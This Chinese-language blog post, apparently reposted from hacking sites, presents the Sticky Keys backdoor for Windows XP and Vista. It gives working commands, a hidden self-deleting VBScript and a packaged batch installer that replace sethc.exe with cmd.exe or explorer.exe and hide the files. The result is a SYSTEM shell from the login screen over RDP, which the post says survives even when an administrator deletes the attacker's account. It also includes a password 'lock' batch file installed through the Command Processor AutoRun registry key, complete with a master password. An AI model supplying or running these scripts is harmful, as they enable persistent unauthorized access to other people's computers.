最酷的windows后门

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自运应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

  
  
  
  
  1. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
  2. "AutoRun"="bdlock.bat"  
  3.  
  4. @Echo Off  
  5. title 后门登陆验证  
  6. color a  
  7. cls  
  8. set temprandom=%RANDOM%  
  9. echo 请输入验证码:%temprandom%  
  10. set/p check=  
  11. if "%check%"=="%temprandom%%temprandom%" goto passcheck  
  12. if "%check%"=="%temprandom%" (  
  13. rem 后门服务器验证  
  14. rem 如果没有后门验证服务器请rem注释掉下一行代码  
  15. if exist \192.168.8.8\backdoor$\pass goto passcheck  
  16. )  
  17. echo 验证失败  
  18. pause  
  19. exit  
  20. :passcheck  
  21. echo 验证成功  
  22. If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
  23. Set passcmdlock=http://blog.csdn.net/freexploit/  
  24. :allyesno  
  25. Set Errorlevel=>nul  
  26. Echo 请输入验证密码?  
  27. Set password=allyesno Is a pig>nul  
  28. Set/p password=  
  29. rem 万能密码  
  30. if "%password%"=="allyesno is a sb" goto endx  
  31. If %time:~1,1%==0 Set timechange=a  
  32. If %time:~1,1%==1 Set timechange=b 
  33. If %time:~1,1%==2 Set timechange=c  
  34. If %time:~1,1%==3 Set timechange=d 
  35. If %time:~1,1%==4 Set timechange=e  
  36. If %time:~1,1%==5 Set timechange=f 
  37. If %time:~1,1%==6 Set timechange=g  
  38. If %time:~1,1%==7 Set timechange=h  
  39. If %time:~1,1%==8 Set timechange=i  
  40. If %time:~1,1%==9 Set timechange=j 
  41. set/a sum=%time:~1,1%+%time:~1,1%  
  42. Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
  43. If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
  44. Echo 请联系瑞星客服咨询正确密码!&Goto allyesno  
  45. :End  
  46. Set password=>nul  
  47. Set Errorlevel=>nul  
  48.  

Echo 很好,很和谐!
:endx将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~

然后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe

或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~

哇哈哈哈哈~~~
TITLE Shift后门
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:TT 整合 QQ:869293
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:TT QQ: 869293
echo.
echo http://www.hack518.net
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
 

 

你可能感兴趣的:(windows,职场,休闲,后门)